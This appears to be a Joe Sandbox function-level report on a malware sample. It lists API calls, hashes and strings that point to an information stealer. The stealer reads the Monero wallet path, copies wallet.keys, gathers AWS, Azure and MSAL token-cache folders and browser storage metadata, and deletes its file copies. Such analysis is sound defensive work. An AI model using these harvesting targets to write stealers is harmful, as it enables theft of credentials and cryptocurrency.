                                • API String ID: 2672039231-3252725368
                                • Opcode ID: 86baf7854502865d76c28dea4d31067177417489646e6c80c3cbffcab511bded
                                • Instruction ID: 5ff726808e6b63e257e8430f0b31928c90d80eb17e5a8dc0fb66651d62f004f6
                                • Opcode Fuzzy Hash: 86baf7854502865d76c28dea4d31067177417489646e6c80c3cbffcab511bded
                                • Instruction Fuzzy Hash: 7DF14DB1901115EFCB10DB68DD48ADA77BAFF88300F14469AE949E7350DF70AE45CBA0
                                APIs
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006A1F9F
                                • lstrlen.KERNEL32(01339358), ref: 006A1FAE
                                • lstrcpy.KERNEL32(00000000,?), ref: 006A1FDB
                                • lstrcat.KERNEL32(00000000,?), ref: 006A1FE3
                                • lstrlen.KERNEL32(006D1794), ref: 006A1FEE
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006A200E
                                • lstrcat.KERNEL32(00000000,006D1794), ref: 006A201A
                                • lstrcpy.KERNEL32(00000000,?), ref: 006A2042
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006A204D
                                • lstrlen.KERNEL32(006D1794), ref: 006A2058
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006A2075
                                • lstrcat.KERNEL32(00000000,006D1794), ref: 006A2081
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006A20AC
                                • lstrlen.KERNEL32(?), ref: 006A20E4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006A2104
                                • lstrcat.KERNEL32(00000000,?), ref: 006A2112
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006A2139
                                • lstrlen.KERNEL32(006D1794), ref: 006A214B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006A216B
                                • lstrcat.KERNEL32(00000000,006D1794), ref: 006A2177
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006A219D
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006A21A8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006A21D4
                                • lstrlen.KERNEL32(?), ref: 006A21EA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006A220A
                                • lstrcat.KERNEL32(00000000,?), ref: 006A2218
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006A2242
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006A227F
                                • lstrlen.KERNEL32(0133D7E0), ref: 006A228D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006A22B1
                                • lstrcat.KERNEL32(00000000,0133D7E0), ref: 006A22B9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006A22F7
                                • lstrcat.KERNEL32(00000000), ref: 006A2304
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006A232D
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 006A2356
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006A2382
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006A23BF
                                • DeleteFileA.KERNEL32(00000000), ref: 006A23F7
                                • FindNextFileA.KERNEL32(00000000,?), ref: 006A2444
                                • FindClose.KERNEL32(00000000), ref: 006A2453
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$File$Find$CloseCopyDeleteNext
                                • String ID:
                                • API String ID: 2857443207-0
                                • Opcode ID: e7ab9dd5a70ac078925b0c04ffca83aeb68fd6df9af1a357d4f7041b201f6c04
                                • Instruction ID: 67afb65a3ed25fb55be20989e58f3ba3a6afddb0ddc828045a8340ed27d9bb8c
                                • Opcode Fuzzy Hash: e7ab9dd5a70ac078925b0c04ffca83aeb68fd6df9af1a357d4f7041b201f6c04
                                • Instruction Fuzzy Hash: 73E17E70A512179BCB61FF69DC95AEEB7BABF06300F044169F909A7221DB34DD018FA4
                                APIs
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006B6445
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006B6480
                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 006B64AA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B64E1
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B6506
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006B650E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B6537
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$FolderPathlstrcat
                                • String ID: \..\
                                • API String ID: 2938889746-4220915743
                                • Opcode ID: e0a5d9b9757467fcd9e64a1262d270284e2a756e1918aab84d970960a0044743
                                • Instruction ID: a8ce0aeaedcf3670e90b8824f5ba34fc0db0c6b589d87fe12f96c3fb23f7c000
                                • Opcode Fuzzy Hash: e0a5d9b9757467fcd9e64a1262d270284e2a756e1918aab84d970960a0044743
                                • Instruction Fuzzy Hash: 6DF1BCB1A112169BCB21AF69D859AEE77B6BF01300F04416DF85AD7361EB38DC81CF94
                                APIs
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006B43A3
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006B43D6
                                • lstrcpy.KERNEL32(00000000,?), ref: 006B43FE
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006B4409
                                • lstrlen.KERNEL32(\storage\default\), ref: 006B4414
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B4431
                                • lstrcat.KERNEL32(00000000,\storage\default\), ref: 006B443D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B4466
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006B4471
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B4498
                                • lstrcpy.KERNEL32(00000000,?), ref: 006B44D7
                                • lstrcat.KERNEL32(00000000,?), ref: 006B44DF
                                • lstrlen.KERNEL32(006D1794), ref: 006B44EA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B4507
                                • lstrcat.KERNEL32(00000000,006D1794), ref: 006B4513
                                • lstrlen.KERNEL32(.metadata-v2), ref: 006B451E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B453B
                                • lstrcat.KERNEL32(00000000,.metadata-v2), ref: 006B4547
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B456E
                                • lstrcpy.KERNEL32(00000000,?), ref: 006B45A0
                                • GetFileAttributesA.KERNEL32(00000000), ref: 006B45A7
                                • lstrcpy.KERNEL32(00000000,?), ref: 006B4601
                                • lstrcpy.KERNEL32(00000000,?), ref: 006B462A
                                • lstrcpy.KERNEL32(00000000,?), ref: 006B4653
                                • lstrcpy.KERNEL32(00000000,?), ref: 006B467B
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006B46AF
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                 • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$AttributesFile
                                • String ID: .metadata-v2$\storage\default\
                                • API String ID: 1033685851-762053450
                                • Opcode ID: 3b41386bde6faae4789dc23a0e98bf5c305ded8c6afd6c5b73be8f343599edf6
                                • Instruction ID: 86318799018908d2748489617a9814d910795437acb8c6c407f29868412e2efd
                                • Opcode Fuzzy Hash: 3b41386bde6faae4789dc23a0e98bf5c305ded8c6afd6c5b73be8f343599edf6
                                • Instruction Fuzzy Hash: 99B17AB1A116169BCB21BF79D859AEE77AAAF01700F04012DF84AE7752EF34DC418B94
                                APIs
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006B57D5
                                • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 006B5804
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B5835
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B585D
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006B5868
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B5890
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B58C8
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006B58D3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B58F8
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006B592E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B5956
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006B5961
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B5988
                                • lstrlen.KERNEL32(006D1794), ref: 006B599A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B59B9
                                • lstrcat.KERNEL32(00000000,006D1794), ref: 006B59C5
                                • lstrlen.KERNEL32(0133D708), ref: 006B59D4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B59F7
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006B5A02
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B5A2C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B5A58
                                • GetFileAttributesA.KERNEL32(00000000), ref: 006B5A5F
                                • lstrcpy.KERNEL32(00000000,?), ref: 006B5AB7
                                • lstrcpy.KERNEL32(00000000,?), ref: 006B5B2D
                                • lstrcpy.KERNEL32(00000000,?), ref: 006B5B56
                                • lstrcpy.KERNEL32(00000000,?), ref: 006B5B89
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B5BB5
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006B5BEF
                                • lstrcpy.KERNEL32(00000000,?), ref: 006B5C4C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B5C70
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                 • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$AttributesFileFolderPath
                                • String ID:
                                • API String ID: 2428362635-0
                                • Opcode ID: 3edd46680fc4bda2fbf6bc7008f45b1b23b61fa8aded9d9ba9f97874365a134a
                                • Instruction ID: a835a4c0816d1e2aa212504569cfdb0ed7ace5fdb3816228e3d254954a962aeb
                                • Opcode Fuzzy Hash: 3edd46680fc4bda2fbf6bc7008f45b1b23b61fa8aded9d9ba9f97874365a134a
                                • Instruction Fuzzy Hash: B002B2B0A116169BCB21FF69D899AEEB7B6BF04300F04416DF94AA7350DB34DC818F94
                                APIs
                                  • Part of subcall function 006A1120: GetProcessHeap.KERNEL32(00000000,00000104), ref: 006A1135
                                  • Part of subcall function 006A1120: RtlAllocateHeap.NTDLL(00000000), ref: 006A113C
                                  • Part of subcall function 006A1120: RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 006A1159
                                  • Part of subcall function 006A1120: RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 006A1173
                                  • Part of subcall function 006A1120: RegCloseKey.ADVAPI32(?), ref: 006A117D
                                • lstrcat.KERNEL32(?,00000000), ref: 006A11C0
                                • lstrlen.KERNEL32(?), ref: 006A11CD
                                • lstrcat.KERNEL32(?,.keys), ref: 006A11E8
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006A121F
                                • lstrlen.KERNEL32(01339358), ref: 006A122D
                                • lstrcpy.KERNEL32(00000000,?), ref: 006A1251
                                • lstrcat.KERNEL32(00000000,01339358), ref: 006A1259
                                • lstrlen.KERNEL32(\Monero\wallet.keys), ref: 006A1264
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006A1288
                                • lstrcat.KERNEL32(00000000,\Monero\wallet.keys), ref: 006A1294
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006A12BA
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006A12FF
                                • lstrlen.KERNEL32(0133D7E0), ref: 006A130E
                                • lstrcpy.KERNEL32(00000000,?), ref: 006A1335
                                • lstrcat.KERNEL32(00000000,?), ref: 006A133D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006A1378
                                • lstrcat.KERNEL32(00000000), ref: 006A1385
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006A13AC
                                • CopyFileA.KERNEL32(?,?,00000001), ref: 006A13D5
                                • lstrcpy.KERNEL32(00000000,?), ref: 006A1401
                                • lstrcpy.KERNEL32(00000000,?), ref: 006A143D
                                  • Part of subcall function 006BEDE0: lstrcpy.KERNEL32(00000000,?), ref: 006BEE12
                                • DeleteFileA.KERNEL32(?), ref: 006A1471
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                 • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$FileHeap$AllocateCloseCopyDeleteOpenProcessQueryValue
                                • String ID: .keys$\Monero\wallet.keys
                                • API String ID: 2881711868-3586502688
                                • Opcode ID: c73d4736743b78eafe6648618b9924c9a8630179a0e36f2620d9d3fa6f0489d6
                                • Instruction ID: c08793fc396b990ab7d02cb3f7ca700748c2f44bbeea32f0fb74163d3f4a9264
                                • Opcode Fuzzy Hash: c73d4736743b78eafe6648618b9924c9a8630179a0e36f2620d9d3fa6f0489d6
                                • Instruction Fuzzy Hash: B3A1C171A112069BCB21FF79DC59ADEB7BAAF06300F040169F909EB211EB34DE418F94
                                APIs
                                • memset.MSVCRT ref: 006BE740
                                • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 006BE769
                                • lstrcpy.KERNEL32(00000000,?), ref: 006BE79F
                                • lstrcat.KERNEL32(?,00000000), ref: 006BE7AD
                                • lstrcat.KERNEL32(?,\.azure\), ref: 006BE7C6
                                • memset.MSVCRT ref: 006BE805
                                • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 006BE82D
                                • lstrcpy.KERNEL32(00000000,?), ref: 006BE85F
                                • lstrcat.KERNEL32(?,00000000), ref: 006BE86D
                                • lstrcat.KERNEL32(?,\.aws\), ref: 006BE886
                                • memset.MSVCRT ref: 006BE8C5
                                • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 006BE8F1
                                • lstrcpy.KERNEL32(00000000,?), ref: 006BE920
                                • lstrcat.KERNEL32(?,00000000), ref: 006BE92E
                                • lstrcat.KERNEL32(?,\.IdentityService\), ref: 006BE947
                                • memset.MSVCRT ref: 006BE986
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                 • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$memset$FolderPathlstrcpy
                                • String ID: *.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                • API String ID: 4067350539-3645552435
                                • Opcode ID: e4ca8ec75b9abbee7e15aaf3e0c9f9bee898a51440a0439aea25c1331f1f6189
                                • Instruction ID: a031dc9c6d5493817ca4744d3711bdc171d9d7f5b4401a8aa2476e526fe6a704
                                • Opcode Fuzzy Hash: e4ca8ec75b9abbee7e15aaf3e0c9f9bee898a51440a0439aea25c1331f1f6189
                                • Instruction Fuzzy Hash: 3A71D5B1E40219ABDB61FB64DC46FED7375AF48700F0104A9F7199B191DE709E848F98
                                APIs
                                • lstrcpy.KERNEL32 ref: 006BABCF
                                • lstrlen.KERNEL32(0133EB48), ref: 006BABE5
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006BAC0D
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006BAC18
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006BAC41
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006BAC84
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006BAC8E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006BACB7
                                • lstrlen.KERNEL32(006D4AD4), ref: 006BACD1
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006BACF3
                                • lstrcat.KERNEL32(00000000,006D4AD4), ref: 006BACFF
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006BAD28
                                • lstrlen.KERNEL32(006D4AD4), ref: 006BAD3A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006BAD5C
                                • lstrcat.KERNEL32(00000000,006D4AD4), ref: 006BAD68
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006BAD91
                                • lstrlen.KERNEL32(0133E9F8), ref: 006BADA7
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006BADCF
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006BADDA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006BAE03
                                • lstrcpy.KERNEL32(00000000,?), ref: 006BAE3F
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006BAE49
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006BAE6F
                                • lstrlen.KERNEL32(00000000), ref: 006BAE85
                                • lstrcpy.KERNEL32(00000000,0133EB78), ref: 006BAEB8
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                 • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen
                                • String ID: f
                                • API String ID: 2762123234-1993550816
                                • Opcode ID: 737ed1dee8cb70a684bcd24652b427280c03084737728c1510d0dd40fd27a9ed
                                • Instruction ID: b0b9062e27c3eac53a323f13f847bc062de63cea4441ad2e315bbb4786678c29
